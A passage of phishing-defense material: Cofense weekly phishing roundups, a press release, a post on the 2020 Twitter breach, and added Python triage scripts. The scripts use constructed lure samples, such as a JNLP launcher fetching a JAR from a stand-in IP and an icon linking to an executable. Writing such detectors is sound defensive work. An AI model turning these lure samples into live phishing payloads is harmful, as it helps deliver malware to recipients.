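    <jar href="http://203.0.113.6/lib/util.jar"/>
  </resources>
  <application-desc main-class="Loader"/>
</jnlp>
"""


def zip_bytes(name: str, data: bytes) -> bytes:
    """Wrap one file in an in-memory zip (stands in for the zipped attachment)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(name, data)
    return buf.getvalue()


SAMPLE_ZIP = zip_bytes("Rimborso.jnlp", SAMPLE_JNLP)


def parse_jnlp(data: bytes) -> dict:
    """Codebase, resolved JAR URLs, entry class and permission request.

    ElementTree is fine for a triage script on one attachment, but it does
    not defend against entity-expansion bombs; use defusedxml in a service
    that parses attachments at scale.
    """
    root = ET.fromstring(data)
    if root.tag != "jnlp":
        raise ValueError("not a JNLP document: root is <%s>" % root.tag)
    codebase = root.get("codebase", "")
    # Relative hrefs resolve against codebase; absolute ones stay as written.
    jars = [urljoin(codebase, j.get("href", "")) for j in root.iter("jar")]
    app = root.find("application-desc")
    main_class = app.get("main-class") if app is not None else None
    return {
        "codebase": codebase,
        "jars": jars,
        "main_class": main_class,
        "all_permissions": root.find("./security/all-permissions") is not None,
        "remote_code": any(j.startswith(("http://", "https://")) for j in jars),
    }


def extract_jnlp(data: bytes) -> list:
    """Accept a bare .jnlp or a zip containing .jnlp members; return one dict each."""
    if zipfile.is_zipfile(io.BytesIO(data)):
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return [parse_jnlp(zf.read(n)) for n in zf.namelist() if n.lower().endswith(".jnlp")]
    return [parse_jnlp(data)]


if __name__ == "__main__":
    for report in extract_jnlp(SAMPLE_ZIP):
        print(report)
```

The jars list is what you block or hunt for: every URL in it is code the victim's JVM would have downloaded, and an all-permissions request combined with a remote codebase is the shape a legitimate internal launcher rarely has.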

Phishing example of credential theft using a Dropbox link

TYPE: Credential Theft

DESCRIPTION: Cloud storage is certainly convenient for sharing files with friends and colleagues. Attackers think so, too. This one uses Dropbox to deliver a credential phishing page to the recipient. How convenient is that?

Phishing example uses a delivery spoof with a link to a credential theft page

TYPE: Credential Theft

DESCRIPTION: These attackers really stepped up their game with a convincing looking phish mimicking another logistics company. If only it hadn’t come from a Hotmail account.

Phishing example uses an image link to direct the recipient to the Pyrogenic Stealer

TYPE: Malware – Pyrogenic

DESCRIPTION: It may look like a PDF, but this finance-themed phish actually delivers a linked image that appears to be an attachment. The link leads to the Pyrogenic Stealer.
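The image-that-looks-like-an-attachment pattern here, and in the Pyrogenic and NanoCore lures from the previous week, is detectable in the HTML body itself: an <img> styled as a document icon sitting inside an <a href> that points somewhere the message has no business sending you. The Python below is an added example, not from the posts and not a Cofense tool, that pulls every linked image out of an HTML body and scores it on three signals: a document-like label, an executable or archive as the link target, and a bare-IP host. SAMPLE_HTML is constructed: a fake payment notice whose PDF-looking icon links to an executable, next to a harmless logo link that should not fire.

```python
"""Find images inside links in an HTML email body: the 'image that looks
like an attachment' trick used by the Pyrogenic and NanoCore lures above.

Added example; not from the posts and not a Cofense tool. SAMPLE_HTML is
constructed: a fake payment notice whose PDF-looking icon links to an
executable on a bare-IP host, next to a harmless logo link.
"""
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlsplit

SAMPLE_HTML = """
<html><body>
<p>Please find attached the payment advice for your records.</p>
<a href="http://203.0.113.9/dl/Payment_Advice.exe">
  <img src="cid:pdf-icon" alt="Payment_Advice.pdf" width="120">
</a>
<p>Click <a href="https://203.0.113.9/get">DOWNLOAD</a> if the preview does not open.</p>
<a href="https://www.example.com/about"><img src="https://www.example.com/logo.png" alt="Example Corp"></a>
</body></html>
"""

EXEC_EXT = (".exe", ".scr", ".js", ".vbs", ".jar", ".zip", ".iso", ".img", ".lnk")
DOC_HINTS = ("pdf", "doc", "xls", "invoice", "payment", "quote", "attach")


class LinkedImageFinder(HTMLParser):
    """Collect every <img> that sits inside an <a href> (an image used as a button)."""

    def __init__(self):
        super().__init__()
        self._href = None
        self.found = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "a":
            self._href = a.get("href")
        elif tag == "img" and self._href is not None:
            self.found.append({"href": self._href, "src": a.get("src", ""), "alt": a.get("alt", "")})

    def handle_endtag(self, tag):
        if tag == "a":
            self._href = None


def linked_images(html: str) -> list:
    p = LinkedImageFinder()
    p.feed(html)
    p.close()
    return p.found


def _is_ip(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def suspicious_linked_images(html: str) -> list:
    """Linked images with reasons to treat them as a disguised download button."""
    out = []
    for item in linked_images(html):
        u = urlsplit(item["href"])
        host = (u.hostname or "").lower()
        label = (item["alt"] + " " + item["src"].rsplit("/", 1)[-1]).lower()
        reasons = []
        if any(h in label for h in DOC_HINTS):
            reasons.append("image is labelled like a document")
        if u.path.lower().endswith(EXEC_EXT):
            reasons.append("link target is an executable or archive")
        if _is_ip(host):
            reasons.append("link target host is a bare IP address")
        if reasons:
            out.append({**item, "reasons": reasons})
    return out


if __name__ == "__main__":
    for hit in suspicious_linked_images(SAMPLE_HTML):
        print(hit["href"], "->", "; ".join(hit["reasons"]))
```

In practice the link target is often a cloud-storage or redirector URL rather than a bare IP, so the label signal does most of the work; the host and extension checks are there to raise the score when the attacker is lazy.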

Phishing example of a OneDrive link to download the Agent Tesla keylogger

TYPE: Malware – Agent Tesla

DESCRIPTION: Here’s your quote for the day: beware of emails bearing malware. This attack identifies as a quote but delivers the Agent Tesla Keylogger via an embedded URL.

Phishing example uses a coronavirus theme to perform credential theft

TYPE: Credential Theft

DESCRIPTION: They say rest and exercise are good for you, but this exercise starter kit from HR is really at the other end of the scale. The provided link takes the recipient to a web page designed to steal their credentials. That’s sure to get your heart rate up.


Phish Found in Proofpoint-Protected Environments – Week Ending August 2, 2020

100% of the phish seen by the Cofense Phishing Defense Center (PDC) were found in environments protected by Secure Email Gateways (SEGs), were reported by humans, and were automatically analyzed and dispositioned by Cofense Triage.

Cofense solutions enable organizations to identify, analyze, and quarantine email threats in minutes.

Are phishing emails evading your Proofpoint Secure Email Gateway? The following are examples of phishing emails seen by the PDC in environments protected by Proofpoint. We note quite a bit of spoofing this week. Attackers know if they can get their phishing attacks into a user’s inbox, they still need to convince the user to click. If you need help raising the awareness of your users, check out some of our free resources.

Figure: Invoice-themed phishing example delivering the Pyrogenic Stealer via an embedded link.

TYPE: Malware – Pyrogenic

DESCRIPTION: For such a polite email, it carries an awfully impolite payload: this finance-themed phish uses an embedded URL disguised as a PDF to deliver the Pyrogenic Stealer.

Figure: Phishing example using a PDF attachment to perform credential theft.

TYPE: Credential Theft

DESCRIPTION: Spoofing an international logistics company, this phish delivers an attached PDF with embedded links to a credential phishing site.

Figure: Phishing example of a purchase order link that delivers the NanoCore remote access trojan.

TYPE: Malware – NanoCore

DESCRIPTION: Everyone knows Dropbox is a legitimate cloud storage provider so, when we get a purchase order hosted on Dropbox, we click it. At least, that’s what the attacker hopes. In this attack, an archive holding the NanoCore Remote Access Trojan is downloaded. We’ve been discussing the use of Dropbox in phishing attacks for over 5 years.

Figure: Phishing example spoofing a logistics company to deliver Avaddon ransomware and Raccoon Stealer.

TYPE: Malware – Avaddon

DESCRIPTION: Another spoof of a major logistics company. This one really delivers. Using an embedded URL, it delivers the Smoke Loader, which then downloads Raccoon Stealer and Avaddon Ransomware. Read more about ransomware trends.

Figure: Phishing example spoofing a voicemail notification, delivering an .htm attachment to perform credential theft.

TYPE: Credential Theft

DESCRIPTION: Stop me if you’ve heard this one. A spoofed voicemail notification uses an attached .htm file to mimic a Microsoft page to steal credentials. Voicemail notification phish are nothing new, but still reach users regularly.

Figure: Phishing example delivering the Remcos RAT using a .xxe archive.

TYPE: Malware – Remcos

DESCRIPTION: Self-quarantines and remote work arrangements seem like a recipe for increased deliveries and this phish takes advantage of that. Another logistics company spoof offers an invoice as a lure. In a rare twist, the attack delivers a .xxe archive that contains GuLoader, which will install the Remcos Remote Access Trojan.

Figure: Phishing example using box.com to deliver Ursnif malware.

TYPE: Malware – Ursnif

DESCRIPTION: Another attack relying on trust in a popular cloud storage provider. This one includes a link to a .js file that downloads and executes Ursnif. Are we having trust issues?

Figure: Phishing example delivering a password-protected zip to install the IcedID banking trojan.

TYPE: Malware – IcedID

DESCRIPTION: If it is protected by a password, it must be secure. That’s the lure this attacker uses to convince the recipient to open the attached .zip archive, enable the macros in the enclosed Microsoft Office document, and install the IcedID trojan. The password also keeps the archive’s contents away from gateway scanners that cannot open it. It’s a blast from the past, as we wrote about password-protected ZIP files in phishing attacks back in 2011.
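The attachment lures in these roundups (the zipped .jnlp, the .js and .htm files, the .xxe archive, and the password-protected zip above) all reward the same defensive habit: look past the outer container to the real file type before the user does. The following is an added example, not Cofense code, of a small Python triage routine that walks an .eml’s MIME parts, opens zip attachments in memory, and flags risky extensions and encrypted zip entries (which it detects from the zip header flag even though it cannot open them). The sender addresses, filenames and attachment bytes in the sample are constructed for this example, and the extension list is an assumption drawn from the examples above rather than a complete policy.

```python
"""Attachment triage for a reported phishing email (.eml)."""
import email
import io
import zipfile
from email import policy
from email.message import EmailMessage

# Extensions from the examples above plus close relatives; matching uses the
# final extension, so "invoice.pdf.js" is treated as a .js script.
RISKY_EXTENSIONS = {
    ".jnlp": "Java Web Start launcher (fetches and runs a JAR)",
    ".jar": "Java archive",
    ".js": "JScript file run by wscript.exe on Windows",
    ".vbs": "VBScript file",
    ".htm": "HTML attachment (phishing page rendered locally)",
    ".html": "HTML attachment (phishing page rendered locally)",
    ".xxe": "XXEncoded file (decodes to a loader or executable)",
    ".doc": "Office document that may carry macros",
    ".xls": "Office workbook that may carry macros",
    ".exe": "Windows executable",
}


def file_ext(name: str) -> str:
    """Lower-cased final extension of a filename, or '' if it has none."""
    name = name.lower()
    return name[name.rfind("."):] if "." in name else ""


def inspect_zip(data: bytes, container: str) -> list:
    """Flag risky and password-protected entries inside a zip attachment."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return [(container, "unreadable zip archive")]
    findings = []
    with zf:
        for info in zf.infolist():
            path = f"{container}/{info.filename}"
            # General-purpose flag bit 0 marks an encrypted entry; the entry
            # names are still readable from the central directory.
            if info.flag_bits & 0x1:
                findings.append((path, "password-protected zip entry"))
            ext = file_ext(info.filename)
            if ext in RISKY_EXTENSIONS:
                findings.append((path, RISKY_EXTENSIONS[ext]))
    return findings


def triage_eml(raw: bytes) -> list:
    """Return (path, reason) pairs for every suspicious attachment in an .eml."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        filename = part.get_filename()
        if not filename:
            continue  # body parts and multipart containers
        payload = part.get_payload(decode=True) or b""
        ext = file_ext(filename)
        if ext in RISKY_EXTENSIONS:
            findings.append((filename, RISKY_EXTENSIONS[ext]))
        if ext == ".zip" or payload.startswith(b"PK\x03\x04"):  # magic, not just name
            findings.extend(inspect_zip(payload, filename))
    return findings


def make_sample_zip(entries, mark_encrypted=False) -> bytes:
    """Constructed sample zip. zipfile cannot write encrypted entries, so for
    the password-protected case we set general-purpose flag bit 0 in each
    local (offset 6) and central-directory (offset 8) header afterwards."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        for name, data in entries:
            zf.writestr(name, data)
    raw = bytearray(buf.getvalue())
    if mark_encrypted:
        for sig, flag_off in ((b"PK\x03\x04", 6), (b"PK\x01\x02", 8)):
            pos = raw.find(sig)
            while pos != -1:
                raw[pos + flag_off] |= 0x01
                pos = raw.find(sig, pos + 4)
    return bytes(raw)


def build_sample_eml() -> bytes:
    """Constructed email (hypothetical addresses) carrying the three lure
    types described above: zipped .jnlp, password-protected zip, .htm file."""
    msg = EmailMessage()
    msg["From"] = "Package Services <notice@example.invalid>"
    msg["To"] = "recipient@example.invalid"
    msg["Subject"] = "Your package is being returned to sender"
    msg.set_content("We could not deliver your package. Details attached.")
    msg.add_attachment(make_sample_zip([("tracking_info.jnlp", b"<jnlp/>")]),
                       maintype="application", subtype="zip", filename="tracking_info.zip")
    msg.add_attachment(make_sample_zip([("invoice.doc", b"stub")], mark_encrypted=True),
                       maintype="application", subtype="zip", filename="invoice.zip")
    msg.add_attachment(b"<html><form method='post'></form></html>",
                       maintype="application", subtype="octet-stream", filename="voicemail.htm")
    return msg.as_bytes()
```

Running `triage_eml(build_sample_eml())` reports the .jnlp inside the first zip, the encrypted entry (and its .doc name) inside the second, and the bare .htm file. The routine only goes one container deep and does not decode XXEncoded content; a production version would recurse and would treat an encrypted archive as a finding in its own right, because the password is precisely what keeps the gateway from looking inside.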

Figure: Phishing example spoofing the Small Business Administration (SBA) with a coronavirus theme to perform credential theft.

TYPE: Credential Theft

DESCRIPTION: While we hoped to get through an entire week’s blog without a COVID-19 example, it wasn’t meant to be. This phish pretends to be from the US Small Business Administration with details about an approved funding request. The embedded URL leads to a credential phishing page. Recipients should keep their mouse at least 6 feet away from the link.


Cofense Expands SOAR Integration Partners to Accelerate Phishing Incident Response

Enhanced integrations between Cofense Triage, Cofense Intelligence and SOAR solutions enable security teams to quickly respond to phishing campaigns that slip past perimeter defenses

LEESBURG, Va., Aug. 3, 2020 – Cofense®, the global leader in intelligent phishing defense solutions, today announced enhanced phishing analysis integrations with Cofense Triage™ and Cofense Intelligence™ to further complement security orchestration, automation and response (SOAR) solutions from Palo Alto Networks Cortex XSOAR, ServiceNow Security Incident Response and Splunk Phantom.

Before phishing threats become actionable, security operations teams must quickly prioritize and analyze large volumes of suspicious emails to understand what is truly malicious. Cofense Triage automatically inspects employee-reported suspicious emails and turns phishing threat indicators into actionable intelligence to help security operations teams respond in minutes to threats that slip past perimeter defenses such as secure email gateways (SEGs). Cofense Intelligence is human-verified phishing intelligence that provides high-fidelity phishing indicators for security teams to respond with confidence when taking action on a phishing threat. Today’s leading SOAR solutions offer many benefits for security operations teams, and Cofense Triage and Cofense Intelligence continue to augment phishing incident response capabilities SOARs offer.

“Threat actors design their attacks to bypass email security controls and successfully deliver phishing emails directly to employee inboxes – technology alone is not enough to stop or analyze phishing threats. Cofense solutions leverage the intelligence of over 23 million human sensors to identify phishing attacks that technology misses every day,” said Allan Carey, Vice President of Business Development at Cofense. “Cofense Triage and Cofense Intelligence are complementary to SOAR, security information and event management (SIEM) and threat intelligence platform (TIP) tools, seamlessly integrating with existing security operations technologies and processes. We are committed to growing our technology partnerships and integrations, which provide mutual customers with accurate and reliable phishing defense determinations.”

“Cofense Triage integrating with Cortex XSOAR helps our security operations team quickly analyze, automate, and respond to phishing attacks in minutes, not hours,” said Rick DeLoach, Associate Director of Security Architecture and Operations, ADT. “The solutions are complementary to help analysts define and execute an effective workflow.”

Cofense Intelligence is an easy-to-consume API feed of malware and credential phishing campaigns. The feed supports automated ingestion into an organization’s SOAR, SIEM, TIP and other select technologies so that defenders can take swift action against emerging phishing campaigns. Every piece of Cofense Intelligence published is rigorously vetted by Cofense and includes the context an organization needs to understand the impact of phishing indicators of compromise (IOCs) and threat actor tactics, techniques and procedures (TTPs).

Cofense Triage offers comprehensive clustering capabilities to group reported emails by payload fingerprint, which addresses the challenge of understanding threats holistically. This allows analysis at a threat campaign level, rather than an individual email level. Organizations looking for a managed phishing defense solution can turn to Cofense’s Phishing Defense Center® (PDC) and receive analyst-reviewed indicators into their SOAR platform and automate escalation and response.
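Clustering by payload fingerprint works because attackers personalize sender, subject and body per recipient but reuse the delivery URL or the attachment. The following Python is an added illustration of that idea and not Cofense Triage’s own implementation: each reported email yields fingerprints (a normalized delivery URL, or the SHA-256 of an attachment), and a union-find pass merges any two reports that share one. The report records, ids, hosts and attachment bytes are constructed for this example.

```python
"""Cluster employee-reported emails by payload fingerprint (added example)."""
import hashlib
from collections import defaultdict
from urllib.parse import urlsplit


def normalize_url(url: str) -> str:
    """Collapse a URL to case-folded host + path, dropping scheme, query,
    fragment and trailing slash, so ?dl=0 and ?dl=1 share links match."""
    parts = urlsplit(url.strip())
    host = (parts.hostname or "").lower()
    path = parts.path.rstrip("/") or "/"
    return f"url:{host}{path}"


def attachment_fingerprint(data: bytes) -> str:
    return "sha256:" + hashlib.sha256(data).hexdigest()


def fingerprints(report: dict) -> set:
    """All payload fingerprints carried by one reported email."""
    fps = {normalize_url(u) for u in report.get("urls", [])}
    fps |= {attachment_fingerprint(a) for a in report.get("attachments", [])}
    return fps


def cluster_reports(reports: list) -> list:
    """Union-find over reports: any shared fingerprint merges two reports.
    Returns clusters, largest first, each with member ids and fingerprints."""
    parent = list(range(len(reports)))

    def find(i):
        while parent[i] != i:
            parent[i] = parent[parent[i]]  # path halving keeps the tree flat
            i = parent[i]
        return i

    def union(a, b):
        ra, rb = find(a), find(b)
        if ra != rb:
            parent[rb] = ra

    first_seen = {}  # fingerprint -> index of the first report carrying it
    for idx, report in enumerate(reports):
        for fp in fingerprints(report):
            if fp in first_seen:
                union(first_seen[fp], idx)
            else:
                first_seen[fp] = idx

    members = defaultdict(list)
    for idx in range(len(reports)):
        members[find(idx)].append(idx)

    clusters = []
    for idxs in members.values():
        shared = set().union(*(fingerprints(reports[i]) for i in idxs))
        clusters.append({"reports": [reports[i]["id"] for i in idxs],
                         "fingerprints": sorted(shared)})
    return sorted(clusters, key=lambda c: -len(c["reports"]))


# Constructed sample reports (hypothetical ids, hosts and attachment bytes):
# two Dropbox-hosted "purchase order" lures, three voicemail/account lures
# tied together by a shared .htm file and a shared login URL, one loner.
HTM_LURE = b"<html><form method='post'>sign-in lookalike</form></html>"
SAMPLE_REPORTS = [
    {"id": "r1", "subject": "PO 4471",
     "urls": ["https://www.dropbox.com/s/abc123/PO_4471.zip?dl=1"]},
    {"id": "r2", "subject": "Purchase Order",
     "urls": ["https://www.dropbox.com/s/abc123/PO_4471.zip?dl=0"]},
    {"id": "r3", "subject": "New voicemail", "attachments": [HTM_LURE]},
    {"id": "r4", "subject": "Voice message", "attachments": [HTM_LURE],
     "urls": ["http://example.invalid/login"]},
    {"id": "r5", "subject": "Account notice",
     "urls": ["http://EXAMPLE.invalid/login/"]},
    {"id": "r6", "subject": "Shared file",
     "urls": ["https://files.example.invalid/f/9"]},
]
```

With the sample above, `cluster_reports(SAMPLE_REPORTS)` yields three clusters: r3, r4 and r5 (joined through the .htm hash and the login URL even though no single pair shares both), r1 and r2 (the same Dropbox share link with different download flags), and r6 alone. The normalization deliberately discards query strings; a kit that encodes the victim in the URL path would split clusters, so in practice the normalizer is tuned per campaign.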

For a limited time, organizations can also stay on top of the latest threats that are confirmed to have reached employees inboxes with 90 days of free access to Cofense Intelligence. To learn more, visit the Cofense Real Phishing Threats searchable database and SEG Infocenter.

About Cofense
Cofense®, the leading provider of intelligent phishing defense solutions worldwide, is uniting humanity against phishing. The Cofense suite of products combines timely attack intelligence on phishing threats that have evaded perimeter controls and were reported by employees, with best-in-class security operations technologies to stop attacks faster and stay ahead of breaches. Cofense customers include Global 1000 organizations in defense, energy, financial services, healthcare and manufacturing sectors that understand how changing user behavior will improve security, aid incident response and reduce the risk of compromise. For additional information, please visit https://www.cofense.com or connect with us on Twitter and LinkedIn.

Twitter Announces Hackers Gained Access via Phishing Attack

By Aaron Higbee

On July 15, 2020, a small number of Twitter employees were duped in a successful spear phishing attack which Twitter is now calling a “phone spear phish”. There is a mention of a phone, but Twitter didn’t elaborate on what role a phone played. (SIM swap? Misleading link via SMS to a credential phishing page?) Regardless, phishing resulted in stolen Twitter employee credentials. Attackers used the stolen credentials to access internal systems and gain information about Twitter processes, then targeted additional employees to breach account support tools. Scam tweets were sent from dozens of major accounts, and the hackers quickly received hundreds of bitcoin transfers worth over $115,000. This type of attack is not unusual, as 74% of real phish are credential phish.

Human Vulnerabilities

Twitter has now provided limited detail about the specific technique used in the spear phishing attack and has not disclosed how many employees or contractors have access to its account support tools. Broad levels of access can pose challenges to defending against phishing. Twitter shared, “This attack relied on a significant and concerted attempt to mislead certain employees and exploit human vulnerabilities to gain access to our internal systems,” and called the incident “a striking reminder of how important each person on our team is in protecting our service”. The attack resulted in:

  • 130 accounts targeted
  • 45 accounts had Tweets sent by attackers
  • 36 accounts had the DM inbox accessed
  • 8 accounts had an archive of “Your Twitter Data” downloaded, none of which were Verified
  • Crypto transfers exceeding $115,000
  • Untold brand damage to Twitter

Human Informants?

In the blog post, Twitter didn’t mention how many Twitter employees were targeted in the phishing campaigns, how many of those employees reported the phishing attempts, and whether or not Twitter security operations were tooled up to act on employee reports of phishing.

The Cofense annual report on employee phishing resiliency shows, perhaps surprisingly, that technology companies tend to sit at the lower end of industry benchmarks.

Too Much Access?

Twitter admits concern around their tools and levels of employee access, yet goes on to claim that access to proprietary tools is “strictly limited and only granted for valid business reasons”. Twitter advises that they have now “significantly limited access to our internal tools and systems” while they complete their investigation, citing “we have teams around the world” that help with account support. Users with account support needs, reported Tweets and applications to Twitter’s developer platform can expect delays. Twitter is focused on restoring access for all account owners who may still be locked out.

Portrait of a Phish

Whether the hackers gained access via phone, a personal device, or office computer, the aim of the attack was to obtain employee credentials. Twitter advises that although their tools, controls, and processes are constantly being updated and improved, they are now “taking a hard look” at how they can make them even more sophisticated.

The specifics of the phish that evaded security controls are vague. Spear phishing tends to be more targeted and dangerous than a typical phishing attack, because the phishing emails are highly believable when tailored to individuals or small, specific groups of people. “Phone phishing” is messy infosec jargon that tends to be a catch-all for all things social engineering that involve a mobile device. A phish via phone could appear to be many things: a message from support requesting credentials for an update, an SMS phish linking the user to a false company login page, or an actual phone call from a friendly colleague requesting login information.

If employees are unaware of the role they play in data breaches, they are more likely to fall for these scams. No amount of security controls can fully secure a network unless employees are also seen as the frontline in phishing defense. Twitter needs to consider building employee resilience to phishing in their plan to become more sophisticated.
